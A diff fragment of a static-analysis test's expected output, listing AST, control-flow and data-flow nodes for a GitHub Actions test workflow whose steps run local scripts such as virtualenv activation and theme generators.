venv/bin/activate | +| .github/workflows/poisonable_steps.yml:12:9:13:6 | Run Step | .github/workflows/poisonable_steps.yml:12:14:12:32 | ./venv/bin/activate | +| .github/workflows/poisonable_steps.yml:13:9:14:6 | Run Step | .github/workflows/poisonable_steps.yml:13:14:13:36 | sh venv/bin/activate.sh | +| .github/workflows/poisonable_steps.yml:14:9:15:6 | Run Step | .github/workflows/poisonable_steps.yml:14:14:14:44 | echo $(sh venv/bin/activate.sh) | +| .github/workflows/poisonable_steps.yml:15:9:16:6 | Run Step | .github/workflows/poisonable_steps.yml:15:14:15:56 | echo foo; sh venv/bin/activate.sh; echo bar | +| .github/workflows/poisonable_steps.yml:16:9:17:6 | Run Step | .github/workflows/poisonable_steps.yml:16:14:16:56 | echo foo \| sh venv/bin/activate.sh > output | +| .github/workflows/poisonable_steps.yml:17:9:18:6 | Run Step | .github/workflows/poisonable_steps.yml:17:14:17:40 | python venv/bin/activate.py | +| .github/workflows/poisonable_steps.yml:18:9:19:6 | Run Step | .github/workflows/poisonable_steps.yml:18:14:18:50 | echo foo; python venv/bin/activate.py | +| .github/workflows/poisonable_steps.yml:19:9:20:6 | Run Step | .github/workflows/poisonable_steps.yml:19:14:19:29 | pnpm run test:ct | +| .github/workflows/poisonable_steps.yml:20:9:21:6 | Run Step | .github/workflows/poisonable_steps.yml:20:14:20:73 | pip install nbformat && python scripts/generate_notebooks.py | +| .github/workflows/poisonable_steps.yml:21:9:22:6 | Run Step | .github/workflows/poisonable_steps.yml:21:14:21:78 | python scripts/generate_theme.py --outfile js/storybook/theme.css | +| .github/workflows/poisonable_steps.yml:22:9:23:6 | Run Step | .github/workflows/poisonable_steps.yml:22:14:22:76 | ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | +| .github/workflows/poisonable_steps.yml:23:9:23:93 | Run Step | .github/workflows/poisonable_steps.yml:23:14:23:92 | bundle run exec ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | | 
.github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | .github/workflows/test.yml:26:13:26:23 | simplesink1 | | .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | .github/workflows/test.yml:27:14:27:63 | echo ${{ steps.source.outputs.all_changed_files }} | | .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | .github/workflows/test.yml:28:13:28:23 | simplesink2 | 
@@ -282,6 +337,82 @@ parentNodes | .github/workflows/multiline.yml:86:14:89:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | .github/workflows/multiline.yml:1:1:89:29 | on: | | .github/workflows/multiline.yml:86:14:89:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | | .github/workflows/multiline.yml:86:14:89:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | .github/workflows/multiline.yml:85:9:89:29 | Run Step | +| .github/workflows/poisonable_steps.yml:1:5:1:8 | push | .github/workflows/poisonable_steps.yml:1:1:23:93 | on: push | +| .github/workflows/poisonable_steps.yml:1:5:1:8 | push | .github/workflows/poisonable_steps.yml:1:1:23:93 | on: push | +| .github/workflows/poisonable_steps.yml:1:5:1:8 | push | .github/workflows/poisonable_steps.yml:1:5:1:8 | push | +| .github/workflows/poisonable_steps.yml:1:5:1:8 | push | .github/workflows/poisonable_steps.yml:1:5:1:8 | push | +| .github/workflows/poisonable_steps.yml:1:5:1:8 | push | .github/workflows/poisonable_steps.yml:1:5:1:8 | push | +| .github/workflows/poisonable_steps.yml:5:5:23:93 | Job: local_commands | .github/workflows/poisonable_steps.yml:1:1:23:93 | on: push | +| .github/workflows/poisonable_steps.yml:5:14:5:26 | ubuntu-latest | .github/workflows/poisonable_steps.yml:1:1:23:93 | on: push | +| .github/workflows/poisonable_steps.yml:5:14:5:26 | ubuntu-latest | .github/workflows/poisonable_steps.yml:5:5:23:93 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:7:9:8:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:23:93 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:7:14:7:30 | venv/bin/activate | .github/workflows/poisonable_steps.yml:1:1:23:93 | on: push | +| .github/workflows/poisonable_steps.yml:7:14:7:30 | venv/bin/activate | .github/workflows/poisonable_steps.yml:5:5:23:93 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:7:14:7:30 | venv/bin/activate | 
.github/workflows/poisonable_steps.yml:7:9:8:6 | Run Step | +| .github/workflows/poisonable_steps.yml:8:9:9:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:23:93 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:8:14:8:32 | . venv/bin/activate | .github/workflows/poisonable_steps.yml:1:1:23:93 | on: push | +| .github/workflows/poisonable_steps.yml:8:14:8:32 | . venv/bin/activate | .github/workflows/poisonable_steps.yml:5:5:23:93 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:8:14:8:32 | . venv/bin/activate | .github/workflows/poisonable_steps.yml:8:9:9:6 | Run Step | +| .github/workflows/poisonable_steps.yml:9:9:10:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:23:93 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:9:14:9:42 | echo foo; . venv/bin/activate | .github/workflows/poisonable_steps.yml:1:1:23:93 | on: push | +| .github/workflows/poisonable_steps.yml:9:14:9:42 | echo foo; . venv/bin/activate | .github/workflows/poisonable_steps.yml:5:5:23:93 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:9:14:9:42 | echo foo; . venv/bin/activate | .github/workflows/poisonable_steps.yml:9:9:10:6 | Run Step | +| .github/workflows/poisonable_steps.yml:10:9:11:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:23:93 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:10:14:10:41 | echo foo;. venv/bin/activate | .github/workflows/poisonable_steps.yml:1:1:23:93 | on: push | +| .github/workflows/poisonable_steps.yml:10:14:10:41 | echo foo;. venv/bin/activate | .github/workflows/poisonable_steps.yml:5:5:23:93 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:10:14:10:41 | echo foo;. 
venv/bin/activate | .github/workflows/poisonable_steps.yml:10:9:11:6 | Run Step | +| .github/workflows/poisonable_steps.yml:11:9:12:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:23:93 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:11:14:11:42 | echo foo \|. venv/bin/activate | .github/workflows/poisonable_steps.yml:1:1:23:93 | on: push | +| .github/workflows/poisonable_steps.yml:11:14:11:42 | echo foo \|. venv/bin/activate | .github/workflows/poisonable_steps.yml:5:5:23:93 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:11:14:11:42 | echo foo \|. venv/bin/activate | .github/workflows/poisonable_steps.yml:11:9:12:6 | Run Step | +| .github/workflows/poisonable_steps.yml:12:9:13:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:23:93 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:12:14:12:32 | ./venv/bin/activate | .github/workflows/poisonable_steps.yml:1:1:23:93 | on: push | +| .github/workflows/poisonable_steps.yml:12:14:12:32 | ./venv/bin/activate | .github/workflows/poisonable_steps.yml:5:5:23:93 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:12:14:12:32 | ./venv/bin/activate | .github/workflows/poisonable_steps.yml:12:9:13:6 | Run Step | +| .github/workflows/poisonable_steps.yml:13:9:14:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:23:93 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:13:14:13:36 | sh venv/bin/activate.sh | .github/workflows/poisonable_steps.yml:1:1:23:93 | on: push | +| .github/workflows/poisonable_steps.yml:13:14:13:36 | sh venv/bin/activate.sh | .github/workflows/poisonable_steps.yml:5:5:23:93 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:13:14:13:36 | sh venv/bin/activate.sh | .github/workflows/poisonable_steps.yml:13:9:14:6 | Run Step | +| .github/workflows/poisonable_steps.yml:14:9:15:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:23:93 | Job: local_commands | +| 
.github/workflows/poisonable_steps.yml:14:14:14:44 | echo $(sh venv/bin/activate.sh) | .github/workflows/poisonable_steps.yml:1:1:23:93 | on: push | +| .github/workflows/poisonable_steps.yml:14:14:14:44 | echo $(sh venv/bin/activate.sh) | .github/workflows/poisonable_steps.yml:5:5:23:93 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:14:14:14:44 | echo $(sh venv/bin/activate.sh) | .github/workflows/poisonable_steps.yml:14:9:15:6 | Run Step | +| .github/workflows/poisonable_steps.yml:15:9:16:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:23:93 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:15:14:15:56 | echo foo; sh venv/bin/activate.sh; echo bar | .github/workflows/poisonable_steps.yml:1:1:23:93 | on: push | +| .github/workflows/poisonable_steps.yml:15:14:15:56 | echo foo; sh venv/bin/activate.sh; echo bar | .github/workflows/poisonable_steps.yml:5:5:23:93 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:15:14:15:56 | echo foo; sh venv/bin/activate.sh; echo bar | .github/workflows/poisonable_steps.yml:15:9:16:6 | Run Step | +| .github/workflows/poisonable_steps.yml:16:9:17:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:23:93 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:16:14:16:56 | echo foo \| sh venv/bin/activate.sh > output | .github/workflows/poisonable_steps.yml:1:1:23:93 | on: push | +| .github/workflows/poisonable_steps.yml:16:14:16:56 | echo foo \| sh venv/bin/activate.sh > output | .github/workflows/poisonable_steps.yml:5:5:23:93 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:16:14:16:56 | echo foo \| sh venv/bin/activate.sh > output | .github/workflows/poisonable_steps.yml:16:9:17:6 | Run Step | +| .github/workflows/poisonable_steps.yml:17:9:18:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:23:93 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:17:14:17:40 | python venv/bin/activate.py | 
.github/workflows/poisonable_steps.yml:1:1:23:93 | on: push | +| .github/workflows/poisonable_steps.yml:17:14:17:40 | python venv/bin/activate.py | .github/workflows/poisonable_steps.yml:5:5:23:93 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:17:14:17:40 | python venv/bin/activate.py | .github/workflows/poisonable_steps.yml:17:9:18:6 | Run Step | +| .github/workflows/poisonable_steps.yml:18:9:19:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:23:93 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:18:14:18:50 | echo foo; python venv/bin/activate.py | .github/workflows/poisonable_steps.yml:1:1:23:93 | on: push | +| .github/workflows/poisonable_steps.yml:18:14:18:50 | echo foo; python venv/bin/activate.py | .github/workflows/poisonable_steps.yml:5:5:23:93 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:18:14:18:50 | echo foo; python venv/bin/activate.py | .github/workflows/poisonable_steps.yml:18:9:19:6 | Run Step | +| .github/workflows/poisonable_steps.yml:19:9:20:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:23:93 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:19:14:19:29 | pnpm run test:ct | .github/workflows/poisonable_steps.yml:1:1:23:93 | on: push | +| .github/workflows/poisonable_steps.yml:19:14:19:29 | pnpm run test:ct | .github/workflows/poisonable_steps.yml:5:5:23:93 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:19:14:19:29 | pnpm run test:ct | .github/workflows/poisonable_steps.yml:19:9:20:6 | Run Step | +| .github/workflows/poisonable_steps.yml:20:9:21:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:23:93 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:20:14:20:73 | pip install nbformat && python scripts/generate_notebooks.py | .github/workflows/poisonable_steps.yml:1:1:23:93 | on: push | +| .github/workflows/poisonable_steps.yml:20:14:20:73 | pip install nbformat && python scripts/generate_notebooks.py | 
.github/workflows/poisonable_steps.yml:5:5:23:93 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:20:14:20:73 | pip install nbformat && python scripts/generate_notebooks.py | .github/workflows/poisonable_steps.yml:20:9:21:6 | Run Step | +| .github/workflows/poisonable_steps.yml:21:9:22:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:23:93 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:21:14:21:78 | python scripts/generate_theme.py --outfile js/storybook/theme.css | .github/workflows/poisonable_steps.yml:1:1:23:93 | on: push | +| .github/workflows/poisonable_steps.yml:21:14:21:78 | python scripts/generate_theme.py --outfile js/storybook/theme.css | .github/workflows/poisonable_steps.yml:5:5:23:93 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:21:14:21:78 | python scripts/generate_theme.py --outfile js/storybook/theme.css | .github/workflows/poisonable_steps.yml:21:9:22:6 | Run Step | +| .github/workflows/poisonable_steps.yml:22:9:23:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:23:93 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:22:14:22:76 | ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | .github/workflows/poisonable_steps.yml:1:1:23:93 | on: push | +| .github/workflows/poisonable_steps.yml:22:14:22:76 | ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | .github/workflows/poisonable_steps.yml:5:5:23:93 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:22:14:22:76 | ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | .github/workflows/poisonable_steps.yml:22:9:23:6 | Run Step | +| .github/workflows/poisonable_steps.yml:23:9:23:93 | Run Step | .github/workflows/poisonable_steps.yml:5:5:23:93 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:23:14:23:92 | bundle run exec ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | .github/workflows/poisonable_steps.yml:1:1:23:93 | on: push 
| +| .github/workflows/poisonable_steps.yml:23:14:23:92 | bundle run exec ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | .github/workflows/poisonable_steps.yml:5:5:23:93 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:23:14:23:92 | bundle run exec ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | .github/workflows/poisonable_steps.yml:23:9:23:93 | Run Step | | .github/workflows/test.yml:1:5:1:8 | push | .github/workflows/test.yml:1:1:40:53 | on: push | | .github/workflows/test.yml:1:5:1:8 | push | .github/workflows/test.yml:1:1:40:53 | on: push | | .github/workflows/test.yml:1:5:1:8 | push | .github/workflows/test.yml:1:5:1:8 | push | 
@@ -438,6 +569,45 @@ cfgNodes | .github/workflows/multiline.yml:79:14:84:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | | .github/workflows/multiline.yml:85:9:89:29 | Run Step | | .github/workflows/multiline.yml:86:14:89:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | +| .github/workflows/poisonable_steps.yml:1:1:23:93 | enter on: push | +| .github/workflows/poisonable_steps.yml:1:1:23:93 | exit on: push | +| .github/workflows/poisonable_steps.yml:1:1:23:93 | exit on: push (normal) | +| .github/workflows/poisonable_steps.yml:1:1:23:93 | on: push | +| .github/workflows/poisonable_steps.yml:5:5:23:93 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:7:9:8:6 | Run Step | +| .github/workflows/poisonable_steps.yml:7:14:7:30 | venv/bin/activate | +| .github/workflows/poisonable_steps.yml:8:9:9:6 | Run Step | +| .github/workflows/poisonable_steps.yml:8:14:8:32 | . venv/bin/activate | +| .github/workflows/poisonable_steps.yml:9:9:10:6 | Run Step | +| .github/workflows/poisonable_steps.yml:9:14:9:42 | echo foo; . venv/bin/activate | +| .github/workflows/poisonable_steps.yml:10:9:11:6 | Run Step | +| .github/workflows/poisonable_steps.yml:10:14:10:41 | echo foo;. venv/bin/activate | +| .github/workflows/poisonable_steps.yml:11:9:12:6 | Run Step | +| .github/workflows/poisonable_steps.yml:11:14:11:42 | echo foo \|. 
venv/bin/activate | +| .github/workflows/poisonable_steps.yml:12:9:13:6 | Run Step | +| .github/workflows/poisonable_steps.yml:12:14:12:32 | ./venv/bin/activate | +| .github/workflows/poisonable_steps.yml:13:9:14:6 | Run Step | +| .github/workflows/poisonable_steps.yml:13:14:13:36 | sh venv/bin/activate.sh | +| .github/workflows/poisonable_steps.yml:14:9:15:6 | Run Step | +| .github/workflows/poisonable_steps.yml:14:14:14:44 | echo $(sh venv/bin/activate.sh) | +| .github/workflows/poisonable_steps.yml:15:9:16:6 | Run Step | +| .github/workflows/poisonable_steps.yml:15:14:15:56 | echo foo; sh venv/bin/activate.sh; echo bar | +| .github/workflows/poisonable_steps.yml:16:9:17:6 | Run Step | +| .github/workflows/poisonable_steps.yml:16:14:16:56 | echo foo \| sh venv/bin/activate.sh > output | +| .github/workflows/poisonable_steps.yml:17:9:18:6 | Run Step | +| .github/workflows/poisonable_steps.yml:17:14:17:40 | python venv/bin/activate.py | +| .github/workflows/poisonable_steps.yml:18:9:19:6 | Run Step | +| .github/workflows/poisonable_steps.yml:18:14:18:50 | echo foo; python venv/bin/activate.py | +| .github/workflows/poisonable_steps.yml:19:9:20:6 | Run Step | +| .github/workflows/poisonable_steps.yml:19:14:19:29 | pnpm run test:ct | +| .github/workflows/poisonable_steps.yml:20:9:21:6 | Run Step | +| .github/workflows/poisonable_steps.yml:20:14:20:73 | pip install nbformat && python scripts/generate_notebooks.py | +| .github/workflows/poisonable_steps.yml:21:9:22:6 | Run Step | +| .github/workflows/poisonable_steps.yml:21:14:21:78 | python scripts/generate_theme.py --outfile js/storybook/theme.css | +| .github/workflows/poisonable_steps.yml:22:9:23:6 | Run Step | +| .github/workflows/poisonable_steps.yml:22:14:22:76 | ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | +| .github/workflows/poisonable_steps.yml:23:9:23:93 | Run Step | +| .github/workflows/poisonable_steps.yml:23:14:23:92 | bundle run exec ruby scripts/generate_theme.rb --outfile 
js/storybook/theme.css | | .github/workflows/test.yml:1:1:40:53 | enter on: push | | .github/workflows/test.yml:1:1:40:53 | exit on: push | | .github/workflows/test.yml:1:1:40:53 | exit on: push (normal) | 
@@ -516,6 +686,41 @@ dfNodes | .github/workflows/multiline.yml:79:14:84:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | | .github/workflows/multiline.yml:85:9:89:29 | Run Step | | .github/workflows/multiline.yml:86:14:89:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | +| .github/workflows/poisonable_steps.yml:5:5:23:93 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:7:9:8:6 | Run Step | +| .github/workflows/poisonable_steps.yml:7:14:7:30 | venv/bin/activate | +| .github/workflows/poisonable_steps.yml:8:9:9:6 | Run Step | +| .github/workflows/poisonable_steps.yml:8:14:8:32 | . venv/bin/activate | +| .github/workflows/poisonable_steps.yml:9:9:10:6 | Run Step | +| .github/workflows/poisonable_steps.yml:9:14:9:42 | echo foo; . venv/bin/activate | +| .github/workflows/poisonable_steps.yml:10:9:11:6 | Run Step | +| .github/workflows/poisonable_steps.yml:10:14:10:41 | echo foo;. venv/bin/activate | +| .github/workflows/poisonable_steps.yml:11:9:12:6 | Run Step | +| .github/workflows/poisonable_steps.yml:11:14:11:42 | echo foo \|. 
venv/bin/activate | +| .github/workflows/poisonable_steps.yml:12:9:13:6 | Run Step | +| .github/workflows/poisonable_steps.yml:12:14:12:32 | ./venv/bin/activate | +| .github/workflows/poisonable_steps.yml:13:9:14:6 | Run Step | +| .github/workflows/poisonable_steps.yml:13:14:13:36 | sh venv/bin/activate.sh | +| .github/workflows/poisonable_steps.yml:14:9:15:6 | Run Step | +| .github/workflows/poisonable_steps.yml:14:14:14:44 | echo $(sh venv/bin/activate.sh) | +| .github/workflows/poisonable_steps.yml:15:9:16:6 | Run Step | +| .github/workflows/poisonable_steps.yml:15:14:15:56 | echo foo; sh venv/bin/activate.sh; echo bar | +| .github/workflows/poisonable_steps.yml:16:9:17:6 | Run Step | +| .github/workflows/poisonable_steps.yml:16:14:16:56 | echo foo \| sh venv/bin/activate.sh > output | +| .github/workflows/poisonable_steps.yml:17:9:18:6 | Run Step | +| .github/workflows/poisonable_steps.yml:17:14:17:40 | python venv/bin/activate.py | +| .github/workflows/poisonable_steps.yml:18:9:19:6 | Run Step | +| .github/workflows/poisonable_steps.yml:18:14:18:50 | echo foo; python venv/bin/activate.py | +| .github/workflows/poisonable_steps.yml:19:9:20:6 | Run Step | +| .github/workflows/poisonable_steps.yml:19:14:19:29 | pnpm run test:ct | +| .github/workflows/poisonable_steps.yml:20:9:21:6 | Run Step | +| .github/workflows/poisonable_steps.yml:20:14:20:73 | pip install nbformat && python scripts/generate_notebooks.py | +| .github/workflows/poisonable_steps.yml:21:9:22:6 | Run Step | +| .github/workflows/poisonable_steps.yml:21:14:21:78 | python scripts/generate_theme.py --outfile js/storybook/theme.css | +| .github/workflows/poisonable_steps.yml:22:9:23:6 | Run Step | +| .github/workflows/poisonable_steps.yml:22:14:22:76 | ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | +| .github/workflows/poisonable_steps.yml:23:9:23:93 | Run Step | +| .github/workflows/poisonable_steps.yml:23:14:23:92 | bundle run exec ruby scripts/generate_theme.rb --outfile 
js/storybook/theme.css | | .github/workflows/test.yml:5:5:31:2 | Job: job1 | | .github/workflows/test.yml:8:7:10:4 | Job outputs node | | .github/workflows/test.yml:8:20:8:50 | steps.step.outputs.value | 
@@ -595,6 +800,41 @@ nodeLocations | .github/workflows/multiline.yml:79:14:84:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | .github/workflows/multiline.yml:79:14:84:29 | .github/workflows/multiline.yml@79:14:84:29 | | .github/workflows/multiline.yml:85:9:89:29 | Run Step | .github/workflows/multiline.yml:85:9:89:29 | .github/workflows/multiline.yml@85:9:89:29 | | .github/workflows/multiline.yml:86:14:89:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | .github/workflows/multiline.yml:86:14:89:29 | .github/workflows/multiline.yml@86:14:89:29 | +| .github/workflows/poisonable_steps.yml:5:5:23:93 | Job: local_commands | .github/workflows/poisonable_steps.yml:5:5:23:93 | .github/workflows/poisonable_steps.yml@5:5:23:93 | +| .github/workflows/poisonable_steps.yml:7:9:8:6 | Run Step | .github/workflows/poisonable_steps.yml:7:9:8:6 | .github/workflows/poisonable_steps.yml@7:9:8:6 | +| .github/workflows/poisonable_steps.yml:7:14:7:30 | venv/bin/activate | .github/workflows/poisonable_steps.yml:7:14:7:30 | .github/workflows/poisonable_steps.yml@7:14:7:30 | +| .github/workflows/poisonable_steps.yml:8:9:9:6 | Run Step | .github/workflows/poisonable_steps.yml:8:9:9:6 | .github/workflows/poisonable_steps.yml@8:9:9:6 | +| .github/workflows/poisonable_steps.yml:8:14:8:32 | . venv/bin/activate | .github/workflows/poisonable_steps.yml:8:14:8:32 | .github/workflows/poisonable_steps.yml@8:14:8:32 | +| .github/workflows/poisonable_steps.yml:9:9:10:6 | Run Step | .github/workflows/poisonable_steps.yml:9:9:10:6 | .github/workflows/poisonable_steps.yml@9:9:10:6 | +| .github/workflows/poisonable_steps.yml:9:14:9:42 | echo foo; . venv/bin/activate | .github/workflows/poisonable_steps.yml:9:14:9:42 | .github/workflows/poisonable_steps.yml@9:14:9:42 | +| .github/workflows/poisonable_steps.yml:10:9:11:6 | Run Step | .github/workflows/poisonable_steps.yml:10:9:11:6 | .github/workflows/poisonable_steps.yml@10:9:11:6 | +| .github/workflows/poisonable_steps.yml:10:14:10:41 | echo foo;. 
venv/bin/activate | .github/workflows/poisonable_steps.yml:10:14:10:41 | .github/workflows/poisonable_steps.yml@10:14:10:41 | +| .github/workflows/poisonable_steps.yml:11:9:12:6 | Run Step | .github/workflows/poisonable_steps.yml:11:9:12:6 | .github/workflows/poisonable_steps.yml@11:9:12:6 | +| .github/workflows/poisonable_steps.yml:11:14:11:42 | echo foo \|. venv/bin/activate | .github/workflows/poisonable_steps.yml:11:14:11:42 | .github/workflows/poisonable_steps.yml@11:14:11:42 | +| .github/workflows/poisonable_steps.yml:12:9:13:6 | Run Step | .github/workflows/poisonable_steps.yml:12:9:13:6 | .github/workflows/poisonable_steps.yml@12:9:13:6 | +| .github/workflows/poisonable_steps.yml:12:14:12:32 | ./venv/bin/activate | .github/workflows/poisonable_steps.yml:12:14:12:32 | .github/workflows/poisonable_steps.yml@12:14:12:32 | +| .github/workflows/poisonable_steps.yml:13:9:14:6 | Run Step | .github/workflows/poisonable_steps.yml:13:9:14:6 | .github/workflows/poisonable_steps.yml@13:9:14:6 | +| .github/workflows/poisonable_steps.yml:13:14:13:36 | sh venv/bin/activate.sh | .github/workflows/poisonable_steps.yml:13:14:13:36 | .github/workflows/poisonable_steps.yml@13:14:13:36 | +| .github/workflows/poisonable_steps.yml:14:9:15:6 | Run Step | .github/workflows/poisonable_steps.yml:14:9:15:6 | .github/workflows/poisonable_steps.yml@14:9:15:6 | +| .github/workflows/poisonable_steps.yml:14:14:14:44 | echo $(sh venv/bin/activate.sh) | .github/workflows/poisonable_steps.yml:14:14:14:44 | .github/workflows/poisonable_steps.yml@14:14:14:44 | +| .github/workflows/poisonable_steps.yml:15:9:16:6 | Run Step | .github/workflows/poisonable_steps.yml:15:9:16:6 | .github/workflows/poisonable_steps.yml@15:9:16:6 | +| .github/workflows/poisonable_steps.yml:15:14:15:56 | echo foo; sh venv/bin/activate.sh; echo bar | .github/workflows/poisonable_steps.yml:15:14:15:56 | .github/workflows/poisonable_steps.yml@15:14:15:56 | +| .github/workflows/poisonable_steps.yml:16:9:17:6 | Run Step | 
.github/workflows/poisonable_steps.yml:16:9:17:6 | .github/workflows/poisonable_steps.yml@16:9:17:6 | +| .github/workflows/poisonable_steps.yml:16:14:16:56 | echo foo \| sh venv/bin/activate.sh > output | .github/workflows/poisonable_steps.yml:16:14:16:56 | .github/workflows/poisonable_steps.yml@16:14:16:56 | +| .github/workflows/poisonable_steps.yml:17:9:18:6 | Run Step | .github/workflows/poisonable_steps.yml:17:9:18:6 | .github/workflows/poisonable_steps.yml@17:9:18:6 | +| .github/workflows/poisonable_steps.yml:17:14:17:40 | python venv/bin/activate.py | .github/workflows/poisonable_steps.yml:17:14:17:40 | .github/workflows/poisonable_steps.yml@17:14:17:40 | +| .github/workflows/poisonable_steps.yml:18:9:19:6 | Run Step | .github/workflows/poisonable_steps.yml:18:9:19:6 | .github/workflows/poisonable_steps.yml@18:9:19:6 | +| .github/workflows/poisonable_steps.yml:18:14:18:50 | echo foo; python venv/bin/activate.py | .github/workflows/poisonable_steps.yml:18:14:18:50 | .github/workflows/poisonable_steps.yml@18:14:18:50 | +| .github/workflows/poisonable_steps.yml:19:9:20:6 | Run Step | .github/workflows/poisonable_steps.yml:19:9:20:6 | .github/workflows/poisonable_steps.yml@19:9:20:6 | +| .github/workflows/poisonable_steps.yml:19:14:19:29 | pnpm run test:ct | .github/workflows/poisonable_steps.yml:19:14:19:29 | .github/workflows/poisonable_steps.yml@19:14:19:29 | +| .github/workflows/poisonable_steps.yml:20:9:21:6 | Run Step | .github/workflows/poisonable_steps.yml:20:9:21:6 | .github/workflows/poisonable_steps.yml@20:9:21:6 | +| .github/workflows/poisonable_steps.yml:20:14:20:73 | pip install nbformat && python scripts/generate_notebooks.py | .github/workflows/poisonable_steps.yml:20:14:20:73 | .github/workflows/poisonable_steps.yml@20:14:20:73 | +| .github/workflows/poisonable_steps.yml:21:9:22:6 | Run Step | .github/workflows/poisonable_steps.yml:21:9:22:6 | .github/workflows/poisonable_steps.yml@21:9:22:6 | +| .github/workflows/poisonable_steps.yml:21:14:21:78 
| python scripts/generate_theme.py --outfile js/storybook/theme.css | .github/workflows/poisonable_steps.yml:21:14:21:78 | .github/workflows/poisonable_steps.yml@21:14:21:78 | +| .github/workflows/poisonable_steps.yml:22:9:23:6 | Run Step | .github/workflows/poisonable_steps.yml:22:9:23:6 | .github/workflows/poisonable_steps.yml@22:9:23:6 | +| .github/workflows/poisonable_steps.yml:22:14:22:76 | ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | .github/workflows/poisonable_steps.yml:22:14:22:76 | .github/workflows/poisonable_steps.yml@22:14:22:76 | +| .github/workflows/poisonable_steps.yml:23:9:23:93 | Run Step | .github/workflows/poisonable_steps.yml:23:9:23:93 | .github/workflows/poisonable_steps.yml@23:9:23:93 | +| .github/workflows/poisonable_steps.yml:23:14:23:92 | bundle run exec ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | .github/workflows/poisonable_steps.yml:23:14:23:92 | .github/workflows/poisonable_steps.yml@23:14:23:92 | | .github/workflows/test.yml:5:5:31:2 | Job: job1 | .github/workflows/test.yml:5:5:31:2 | .github/workflows/test.yml@5:5:31:2 | | .github/workflows/test.yml:8:7:10:4 | Job outputs node | .github/workflows/test.yml:8:7:10:4 | .github/workflows/test.yml@8:7:10:4 | | .github/workflows/test.yml:8:20:8:50 | steps.step.outputs.value | .github/workflows/test.yml:8:20:8:50 | .github/workflows/test.yml@8:20:8:50 | @@ -615,6 +855,7 @@ nodeLocations scopes | .github/workflows/expression_nodes.yml:1:1:21:47 | on: issue_comment | | .github/workflows/multiline.yml:1:1:89:29 | on: | +| .github/workflows/poisonable_steps.yml:1:1:23:93 | on: push | | .github/workflows/test.yml:1:1:40:53 | on: push | sources | ahmadnassri/action-changed-files | * | output.files | filename | manual | diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/test7.yml b/ql/test/query-tests/Security/CWE-829/.github/workflows/test7.yml new file mode 100644 index 00000000000..44f5602ee06 